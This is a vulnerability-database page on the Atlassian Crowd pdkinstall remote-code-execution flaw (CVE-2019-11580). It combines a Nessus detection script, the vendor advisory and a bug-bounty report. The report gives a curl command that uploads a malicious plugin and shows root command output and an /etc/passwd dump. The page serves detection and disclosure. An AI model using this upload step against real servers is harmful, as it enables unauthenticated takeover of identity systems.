Search...

Atlassian Crowd 2.1.x < 3.0.5 / 3.1.x < 3.1.6 / 3.2.x < 3.2.8 / 3.3.x < 3.3.5 / 3.4.x < 3.4.4 RCE (direct check)

2020-07-16T00:00:00

ID CROWD_CVE-2019-11580.NASL
Type nessus
Reporter This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.
Modified 2020-07-16T00:00:00

Description

The version of Atlassian Crowd installed on the remote host is affected by a remote code execution (RCE) vulnerability. An unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary plugins, which permits remote code execution.

                                        
                                            #TRUSTED 3e971037c310d5fb21b4bf63b98f20695b4e16697afd43aba7ac879da113e477c9033c2bd683a3ac32481ec91c55bd50145622a02e8f52ae850ab5e7b0349332f01e58d8165702556230d47fdec6d8498e1b9725e90e63b6d83a0e04446f153c63f9cfc432dbd424b759f7b0e44cb3827872ab24b9f5dab18eabef570720e15a5c4f0046f65a587efd4179ed86d434667339ffeb4afd49420a753b299d0543b56bb62bbd335e090f811b7b2b2371e49a0865d5ef16c08446d6a28f1737064ad0c952b36e633ffa769c081b2af7b1489f5d8d4f8f769c8f287f920dc7c85f43939ca9c5b66e65e5a2cce534c993f500ed3f53aeb3535fdb8cbd8e3059ea04157b60159ee9ff99d7205ad2b0364d26b6746671a7c7ce1ceee5dc836d25a7ab829048c0e1231a0afe30d5b38b761dc57312a97927695c40f78df2ba521e6412b1cbd22178c73240e4ce700c833d4303a6bbf5a1a2c04bc8d4a87e6681bd5e5097f7344091675a23e54a8b526f6b49e4733d4ddd682578490380506a6783326b009bbc2cd7091647a026e9ed6d9c73842966deedfd756fe562f244e5e0184e5d376b1c75e20258f56749dd52f120c42ce741862213fc7d439e70332fedad9cc41c8cce70e3942a738a66fdd0bd5b4e5fa92fd8696c39ffaa63db5f2e05c3633c39d5495e8b7e72bdde6030da9f109f59eaed6c334735eb75c893daf316f874fc7eb7
#
# (C) Tenable Network Security, Inc.
#

include('compat.inc');

if (description)
{
  script_id(138553);
  script_version("1.10");
  script_set_attribute(attribute:"plugin_modification_date", value:"2020/10/30");

  script_cve_id("CVE-2019-11580");
  script_bugtraq_id(108637);
  script_xref(name:"IAVA", value:"2020-A-0499");

  script_name(english:"Atlassian Crowd 2.1.x &lt; 3.0.5 / 3.1.x &lt; 3.1.6 / 3.2.x &lt; 3.2.8 / 3.3.x &lt; 3.3.5 / 3.4.x &lt; 3.4.4 RCE (direct check)");

  script_set_attribute(attribute:"synopsis", value:
"The version of Atlassian Crowd installed on the remote host is affected by a remote code execution (RCE) vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of Atlassian Crowd installed on the remote host is affected by a remote code execution (RCE) vulnerability.
An unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary
plugins, which permits remote code execution.");
  # https://confluence.atlassian.com/crowd/crowd-security-advisory-2019-05-22-970260700.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?f66fbb1c");
  script_set_attribute(attribute:"see_also", value:"https://www.corben.io/atlassian-crowd-rce/");
  script_set_attribute(attribute:"solution", value:
"Upgrade to version 3.0.5, 3.1.6, 3.2.8, 3.3.5, 3.4.4 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2019-11580");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"exploited_by_malware", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2019/05/22");
  script_set_attribute(attribute:"patch_publication_date", value:"2019/05/22");
  script_set_attribute(attribute:"plugin_publication_date", value:"2020/07/16");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:atlassian:crowd");
  script_set_attribute(attribute:"stig_severity", value:"I");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("crowd_detect.nasl");
  script_require_keys("www/crowd");
  script_require_ports("Services/www", 8095);

  exit(0);
}

include('http.inc');
include('install_func.inc');

appname = 'Atlassian Crowd';
app_id  = 'crowd';

# Exit if app is not detected on the target
get_install_count(app_name:app_id, exit_if_zero:TRUE);

port = get_http_port(default:8095);
install = get_single_install(app_name:app_id, webapp:TRUE, port:port);

base_path = install['path'];
url = '/admin/uploadplugin.action';

res = http_send_recv3(
  method : 'POST',
  port   : port,
  item   : base_path + url,
  exit_on_fail : TRUE
);

if ('400' &gt;&lt; res[0] && ('Unable to install plugin' &gt;&lt; res[2] || 'All plugins could not be validated' &gt;&lt; res[2]))
{
  security_report_v4(
    port        : port,
    severity    : SECURITY_HOLE,
    generic     : TRUE,
    request     : make_list(http_last_sent_request()),
    output      : res[0] + res[2]
  );
}
else
{
  audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, build_url(qs:install['path'], port:port));
}

JSON Vulners Source

Initial Source

{"id": "CROWD_CVE-2019-11580.NASL", "bulletinFamily": "scanner", "title": "Atlassian Crowd 2.1.x < 3.0.5 / 3.1.x < 3.1.6 / 3.2.x < 3.2.8 / 3.3.x < 3.3.5 / 3.4.x < 3.4.4 RCE (direct check)", "description": "The version of Atlassian Crowd installed on the remote host is affected by a remote code execution (RCE) vulnerability.\nAn unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary\nplugins, which permits remote code execution.", "published": "2020-07-16T00:00:00", "modified": "2020-07-16T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/138553", "reporter": "This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://www.corben.io/atlassian-crowd-rce/", "http://www.nessus.org/u?f66fbb1c"], "cvelist": ["CVE-2019-11580"], "type": "nessus", "lastseen": "2020-10-31T05:28:00", "edition": 5, "viewCount": 10, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B983621D-529B-4375-AA6C-0DB0FBBF9A94", "AKB:30E011CE-C422-42D7-BC8C-EFFC7B3B11A3"]}, {"type": "cve", "idList": ["CVE-2019-11580"]}, {"type": "atlassian", "idList": ["ATLASSIAN:CWD-5388"]}, {"type": "hackerone", "idList": ["H1:632721"]}, {"type": "nessus", "idList": ["CROWD_3_4_4.NASL"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E", "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0"]}, {"type": "threatpost", "idList": ["THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452"]}], "modified": "2020-10-31T05:28:00", "rev": 2}, "score": {"value": 7.6, "vector": "NONE", "modified": "2020-10-31T05:28:00", "rev": 2}, "vulnersScore": 7.6}, "sourceData": "#TRUSTED 3e971037c310d5fb21b4bf63b98f20695b4e16697afd43aba7ac879da113e477c9033c2bd683a3ac32481ec91c55bd50145622a02e8f52ae850ab5e7b0349332f01e58d8165702556230d47fdec6d8498e1b9725e90e63b6d83a0e04446f153c63f9cfc432dbd424b759f7b0e44cb3827872ab24b9f5dab18eabef570720e15a5c4f0046f65a587efd4179ed86d434667339ffeb4afd49420a753b299d0543b56bb62bbd335e090f811b7b2b2371e49a0865d5ef16c08446d6a28f1737064ad0c952b36e633ffa769c081b2af7b1489f5d8d4f8f769c8f287f920dc7c85f43939ca9c5b66e65e5a2cce534c993f500ed3f53aeb3535fdb8cbd8e3059ea04157b60159ee9ff99d7205ad2b0364d26b6746671a7c7ce1ceee5dc836d25a7ab829048c0e1231a0afe30d5b38b761dc57312a97927695c40f78df2ba521e6412b1cbd22178c73240e4ce700c833d4303a6bbf5a1a2c04bc8d4a87e6681bd5e5097f7344091675a23e54a8b526f6b49e4733d4ddd682578490380506a6783326b009bbc2cd7091647a026e9ed6d9c73842966deedfd756fe562f244e5e0184e5d376b1c75e20258f56749dd52f120c42ce741862213fc7d439e70332fedad9cc41c8cce70e3942a738a66fdd0bd5b4e5fa92fd8696c39ffaa63db5f2e05c3633c39d5495e8b7e72bdde6030da9f109f59eaed6c334735eb75c893daf316f874fc7eb7\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138553);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/30\");\n\n script_cve_id(\"CVE-2019-11580\");\n script_bugtraq_id(108637);\n script_xref(name:\"IAVA\", value:\"2020-A-0499\");\n\n script_name(english:\"Atlassian Crowd 2.1.x < 3.0.5 / 3.1.x < 3.1.6 / 3.2.x < 3.2.8 / 3.3.x < 3.3.5 / 3.4.x < 3.4.4 RCE (direct check)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Atlassian Crowd installed on the remote host is affected by a remote code execution (RCE) vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Atlassian Crowd installed on the remote host is affected by a remote code execution (RCE) vulnerability.\nAn unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary\nplugins, which permits remote code execution.\");\n # https://confluence.atlassian.com/crowd/crowd-security-advisory-2019-05-22-970260700.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f66fbb1c\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.corben.io/atlassian-crowd-rce/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 3.0.5, 3.1.6, 3.2.8, 3.3.5, 3.4.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-11580\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:crowd\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"crowd_detect.nasl\");\n script_require_keys(\"www/crowd\");\n script_require_ports(\"Services/www\", 8095);\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('install_func.inc');\n\nappname = 'Atlassian Crowd';\napp_id = 'crowd';\n\n# Exit if app is not detected on the target\nget_install_count(app_name:app_id, exit_if_zero:TRUE);\n\nport = get_http_port(default:8095);\ninstall = get_single_install(app_name:app_id, webapp:TRUE, port:port);\n\nbase_path = install['path'];\nurl = '/admin/uploadplugin.action';\n\nres = http_send_recv3(\n method : 'POST',\n port : port,\n item : base_path + url,\n exit_on_fail : TRUE\n);\n\nif ('400' >< res[0] && ('Unable to install plugin' >< res[2] || 'All plugins could not be validated' >< res[2]))\n{\n security_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(http_last_sent_request()),\n output : res[0] + res[2]\n );\n}\nelse\n{\n audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, build_url(qs:install['path'], port:port));\n}\n\n\n", "naslFamily": "CGI abuses", "pluginID": "138553", "cpe": ["cpe:/a:atlassian:crowd"], "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "scheme": null}

{"attackerkb": [{"lastseen": "2020-11-18T06:36:29", "bulletinFamily": "info", "cvelist": ["CVE-2019-11580"], "description": "Atlassian Crowd and Crowd Data Center had the pdkinstall development plugin incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center. All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x), from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at October 20, 2020 6:56pm UTC reported:\n\nThis is now supposedly being exploited in the wild by Chinese state actors according to this NSA announcement: <https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n", "modified": "2020-07-24T00:00:00", "published": "2019-06-03T00:00:00", "id": "AKB:30E011CE-C422-42D7-BC8C-EFFC7B3B11A3", "href": "https://attackerkb.com/topics/ibknVO2p8H/cve-2019-11580", "type": "attackerkb", "title": "CVE-2019-11580", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-18T06:36:31", "bulletinFamily": "info", "cvelist": ["CVE-2019-11580"], "description": "Crowd and Crowd Data Center had the pdkinstall development plugin incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center.\n\n \n**Recent assessments:** \n \n**wvu-r7** at July 15, 2019 5:39pm UTC reported:\n\n#### Assessment\n\nI think I would see this in the real world, exploitation is trivial, and attacking an SSO system could be valuable.\n\n#### Additional analysis\n\n> What would happen if I changed the `Content-Type` from `multipart/form-data` to a different `multipart` encoding? Let\u2019s try it.\n> \n> This time I decided to try uploading my malicious plugin with the Content-Type of `multipart/mixed` instead. Maybe that would work?\n\nThey didn\u2019t share how they got there, but it\u2019s an easy find with source code.\n \n \n wvu@kharak:~$ cd Downloads/\n wvu@kharak:~/Downloads$ git clone https://bitbucket.org/atlassian/pdkinstall-plugin.git\n Cloning into 'pdkinstall-plugin'...\n remote: Counting objects: 210, done.\n remote: Compressing objects: 100% (115/115), done.\n remote: Total 210 (delta 88), reused 138 (delta 56)\n Receiving objects: 100% (210/210), 26.20 KiB | 813.00 KiB/s, done.\n Resolving deltas: 100% (88/88), done.\n wvu@kharak:~/Downloads$ cd pdkinstall-plugin/\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$ git grep isMultipart\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: boolean isMultipart = ServletFileUpload.isMultipartContent(req);\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: if (isMultipart)\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$ git grep ServletFileUpload\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java:import org.apache.commons.fileupload.servlet.ServletFileUpload;\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: boolean isMultipart = ServletFileUpload.isMultipartContent(req);\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: ServletFileUpload upload = new ServletFileUpload(factory);\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$\n \n\n<https://commons.apache.org/proper/commons-fileupload/apidocs/org/apache/commons/fileupload/servlet/ServletFileUpload.html>\n\n> This class handles multiple files per single HTML widget, sent using `multipart/mixed` encoding type, as specified by [RFC 1867](<http://www.ietf.org/rfc/rfc1867.txt>).\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 5**busterb** at August 13, 2019 6:10pm UTC reported:\n\n#### Assessment\n\nI think I would see this in the real world, exploitation is trivial, and attacking an SSO system could be valuable.\n\n#### Additional analysis\n\n> What would happen if I changed the `Content-Type` from `multipart/form-data` to a different `multipart` encoding? Let\u2019s try it.\n> \n> This time I decided to try uploading my malicious plugin with the Content-Type of `multipart/mixed` instead. Maybe that would work?\n\nThey didn\u2019t share how they got there, but it\u2019s an easy find with source code.\n \n \n wvu@kharak:~$ cd Downloads/\n wvu@kharak:~/Downloads$ git clone https://bitbucket.org/atlassian/pdkinstall-plugin.git\n Cloning into 'pdkinstall-plugin'...\n remote: Counting objects: 210, done.\n remote: Compressing objects: 100% (115/115), done.\n remote: Total 210 (delta 88), reused 138 (delta 56)\n Receiving objects: 100% (210/210), 26.20 KiB | 813.00 KiB/s, done.\n Resolving deltas: 100% (88/88), done.\n wvu@kharak:~/Downloads$ cd pdkinstall-plugin/\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$ git grep isMultipart\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: boolean isMultipart = ServletFileUpload.isMultipartContent(req);\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: if (isMultipart)\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$ git grep ServletFileUpload\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java:import org.apache.commons.fileupload.servlet.ServletFileUpload;\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: boolean isMultipart = ServletFileUpload.isMultipartContent(req);\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: ServletFileUpload upload = new ServletFileUpload(factory);\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$\n \n\n<https://commons.apache.org/proper/commons-fileupload/apidocs/org/apache/commons/fileupload/servlet/ServletFileUpload.html>\n\n> This class handles multiple files per single HTML widget, sent using `multipart/mixed` encoding type, as specified by [RFC 1867](<http://www.ietf.org/rfc/rfc1867.txt>).\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5**gwillcox-r7** at October 20, 2020 6:56pm UTC reported:\n\n#### Assessment\n\nI think I would see this in the real world, exploitation is trivial, and attacking an SSO system could be valuable.\n\n#### Additional analysis\n\n> What would happen if I changed the `Content-Type` from `multipart/form-data` to a different `multipart` encoding? Let\u2019s try it.\n> \n> This time I decided to try uploading my malicious plugin with the Content-Type of `multipart/mixed` instead. Maybe that would work?\n\nThey didn\u2019t share how they got there, but it\u2019s an easy find with source code.\n \n \n wvu@kharak:~$ cd Downloads/\n wvu@kharak:~/Downloads$ git clone https://bitbucket.org/atlassian/pdkinstall-plugin.git\n Cloning into 'pdkinstall-plugin'...\n remote: Counting objects: 210, done.\n remote: Compressing objects: 100% (115/115), done.\n remote: Total 210 (delta 88), reused 138 (delta 56)\n Receiving objects: 100% (210/210), 26.20 KiB | 813.00 KiB/s, done.\n Resolving deltas: 100% (88/88), done.\n wvu@kharak:~/Downloads$ cd pdkinstall-plugin/\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$ git grep isMultipart\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: boolean isMultipart = ServletFileUpload.isMultipartContent(req);\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: if (isMultipart)\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$ git grep ServletFileUpload\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java:import org.apache.commons.fileupload.servlet.ServletFileUpload;\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: boolean isMultipart = ServletFileUpload.isMultipartContent(req);\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: ServletFileUpload upload = new ServletFileUpload(factory);\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$\n \n\n<https://commons.apache.org/proper/commons-fileupload/apidocs/org/apache/commons/fileupload/servlet/ServletFileUpload.html>\n\n> This class handles multiple files per single HTML widget, sent using `multipart/mixed` encoding type, as specified by [RFC 1867](<http://www.ietf.org/rfc/rfc1867.txt>).\n", "modified": "2020-02-13T00:00:00", "published": "2020-02-13T00:00:00", "id": "AKB:B983621D-529B-4375-AA6C-0DB0FBBF9A94", "href": "https://attackerkb.com/topics/BriLAQlFp1/atlassian-crowd-pdkinstall-development-plugin-incorrectly-enabled-cve-2019-11580", "type": "attackerkb", "title": "Atlassian Crowd: pdkinstall development plugin incorrectly enabled (CVE-2019-11580)", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2020-12-09T21:41:40", "description": "Atlassian Crowd and Crowd Data Center had the pdkinstall development plugin incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center. All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x), from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-06-03T14:29:00", "title": "CVE-2019-11580", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11580"], "modified": "2020-08-24T17:37:00", "cpe": [], "id": "CVE-2019-11580", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-11580", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "atlassian": [{"lastseen": "2020-12-24T14:35:32", "bulletinFamily": "software", "cvelist": ["CVE-2019-11580"], "description": "Crowd and Crowd Data Center had the pdkinstall development plugin incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center.\r\n\r\n*Affected versions:*\r\n * All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x), from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.\r\n\r\nh4. *Fix:*\r\n * Crowd and Crowd Data Center version 3.4.4 is available for download from [https://www.atlassian.com/software/crowd/download]\r\n * Crowd and Crowd Data Center versions 3.0.5, 3.1.6, 3.2.8, and 3.3.5 are available for download from [https://www.atlassian.com/software/crowd/download-archive]\r\n\r\n\u00a0\r\n*Mitigation*\r\n\r\nAtlassian recommends that you upgrade to the latest version. However, this issue can be mitigated as per the following instructions:\r\n # Stop Crowd\r\n # Find and delete any\u00a0pdkinstall-plugin jar files from the Crowd *installation directory and the data directory*\r\n # Remove the\u00a0pdkinstall-plugin jar file from <Crowd installation directory>/crowd-webapp/WEB-INF/classes/atlassian-bundled-plugins.zip\r\n # Start Crowd\r\n # Check that there are no\u00a0pdkinstall-plugin jar files in the *installation directory or the data directory.*\u00a0\r\n\r\n\r\nFor additional details, see the [full advisory|https://confluence.atlassian.com/x/3ADVOQ].", "edition": 11, "modified": "2020-02-17T05:14:59", "published": "2019-05-06T04:06:13", "id": "ATLASSIAN:CWD-5388", "href": "https://jira.atlassian.com/browse/CWD-5388", "title": "Crowd - pdkinstall development plugin incorrectly enabled - CVE-2019-11580", "type": "atlassian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hackerone": [{"lastseen": "2019-10-04T15:31:46", "bulletinFamily": "bugbounty", "bounty": 0.0, "cvelist": ["CVE-2019-11580"], "description": "**Summary:**\nAtlassian Crowd is a centralized identity management application that allows companies to \"Manage users from multiple directories - Active Directory, LDAP, OpenLDAP or Microsoft Azure AD - and control application authentication permissions in one single location.\"\n\nA DOD installation is vulnerable to a remote code execution vulnerability due to not patching CVE-2019-11580.\n\n**Description:**\nFrom Atlassian's public [advisory](https://confluence.atlassian.com/crowd/crowd-security-advisory-2019-05-22-970260700.html):\n\n> Crowd and Crowd Data Center had the pdkinstall development plugin incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center.\n\nThere is no public proof-of-concept for this vulnerability, however, I spent a good amount of time reverse-engineering the \"pdkinstall\" plugin and I was able to successfully construct a working exploit.\n\n## Step-by-step Reproduction Instructions\n\n1. Download and unzip my malicious plugin: rce-plugin.zip {F519371}\n2. `cd` into the directory\n3. Run the following command:\n```\ncurl -k -H \"Content-Type: multipart/content\" \\\n --form \"file_cdl=@rce.jar;type=application/octet-stream\" https://\u2588\u2588\u2588/crowd/admin/uploadplugin.action\n```\n\nYou'll see that the malicious plugin is successfully installed:\n\n```\nInstalled plugin /opt/atlassian/crowd/apache-tomcat/temp/plugindev-2906099909159442588rce.jar\n```\n\nNow visit https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588/crowd/plugins/servlet/hackerone-cdl which invokes my malicious plugin. This executes the command `whoami` which is the user `root`\n\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\ncontents of `/etc/passwd`\n\n```\nroot:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nsync:x:5:0:sync:/sbin:/bin/sync\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588x:6:0:\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/sbin:/sbin/shutdown\n\u2588\u2588\u2588\u2588\u2588\u2588x:7:0:\u2588\u2588\u2588\u2588\u2588\u2588\u2588/sbin:/sbin/halt\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588x:8:12:\u2588\u2588\u2588\u2588\u2588/var/spool/\u2588\u2588\u2588\u2588/sbin/nologin\n\u2588\u2588\u2588x:10:14:\u2588\u2588\u2588/var/spool/\u2588\u2588\u2588\u2588\u2588\u2588\u2588/sbin/nologin\n\u2588\u2588\u2588\u2588\u2588\u2588x:11:0:\u2588\u2588\u2588\u2588\u2588\u2588/root:/sbin/nologin\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588x:12:100:\u2588\u2588\u2588\u2588\u2588\u2588\u2588/usr/\u2588\u2588\u2588\u2588/sbin/nologin\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588x:13:30:\u2588\u2588\u2588\u2588\u2588/var/\u2588\u2588\u2588\u2588\u2588/sbin/nologin\n\u2588\u2588\u2588\u2588x:14:50:FTP User:/var/\u2588\u2588\u2588\u2588\u2588\u2588\u2588/sbin/nologin\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588x:99:99:Nobody:/:/sbin/nologin\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588x:38:38::/etc/\u2588\u2588\u2588\u2588\u2588\u2588/sbin/nologin\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588x:499:76:\"Saslauthd 